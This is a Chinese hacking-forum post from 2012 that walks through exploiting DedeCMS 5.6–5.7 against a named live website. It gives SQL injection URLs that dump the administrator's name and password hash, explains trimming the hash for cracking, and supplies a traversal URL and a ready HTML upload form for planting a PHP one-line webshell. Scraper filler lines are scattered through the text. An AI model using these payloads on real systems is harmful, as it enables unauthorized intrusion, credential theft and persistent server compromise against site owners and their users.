中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
7 G" W& Y( s7 p* Y$ K! e3 P
这站
http://www.political-security.com/
" i4 G2 D5 I/ h5 w
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
4 N2 b: z9 ~2 R0 P0 m# d" M
www.political-security.com/data/mysql_error_trace.inc
爆后台
/ D' a& u9 P/ E9 q4 ?
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
& D8 w5 x) O' I1 B; w
然后写上语句
, V' ~) x6 N8 p" V% h8 ]( |& {- E
查看管理员帐号
8 E: l* s( s2 L- b
http://www.political-security.co ... &membergroup=@`
\. w" \! s% {. D X6 s
6 Z p3 Z. C0 f9 l+ R* Z
admin
# {( |7 q% E% p; ?& S3 h$ O
/ C$ G0 }' M& A
查看管理员密码
, ?' u/ \% l. O& ~4 j, V/ q0 h
http://www.political-security.co ... &membergroup=@`
3 i% C! r2 Y5 B( {9 r0 B
+ }. R% E# V2 B
8d29b1ef9f8c5a5af429
- M: u# E( N4 D$ i; ~' w8 E% ?
) q: K- V5 w+ ^% m
查看管理员密码
" F. x; {, S3 P; |
* u0 C" r9 e* l+ V0 ]$ `
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
4 Q$ \" b( W5 ?4 |" n$ j
6 O$ Q1 g8 I8 P( F% X$ `# ^ K
8d2
( O* U! T& V9 D! Y7 O
9b1ef9f8c5a5af42
; i3 z. U+ f# Z( L0 m$ E! W9 V
9
; C) ^7 h* g5 @5 S% g. k' Q
( n4 [0 D6 C2 F8 v l' t
cmd5没解出来 只好测试第二个方法
# P) Y& c& {2 P/ s" `
& H. S. ~" E: ?1 Y0 w
5 k! u& h" p0 y3 `0 L$ B$ X) U* U
②上传漏洞:
# X: g$ a9 v9 p( m6 }
( S# z# L: V, f* L" o% w
只要登陆会员中心,然后访问页面链接
4 b- }- n# l0 V. K( X' g1 w9 E, n5 C
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
) s! q9 Y/ q$ k0 X& M( M) m8 w4 b
" N% ` |$ g' ?; g5 P" u$ I
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
% z- N6 o! }5 Y& n. \
# F; d+ t7 [3 X- k
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
% c$ R% r) w' H
" T0 [8 f' H9 M( C: J# Y. q8 J/ Q
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
# i% n8 a. J! F0 P. T
或者
9 O. ~ L6 s. P# H; g% B
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2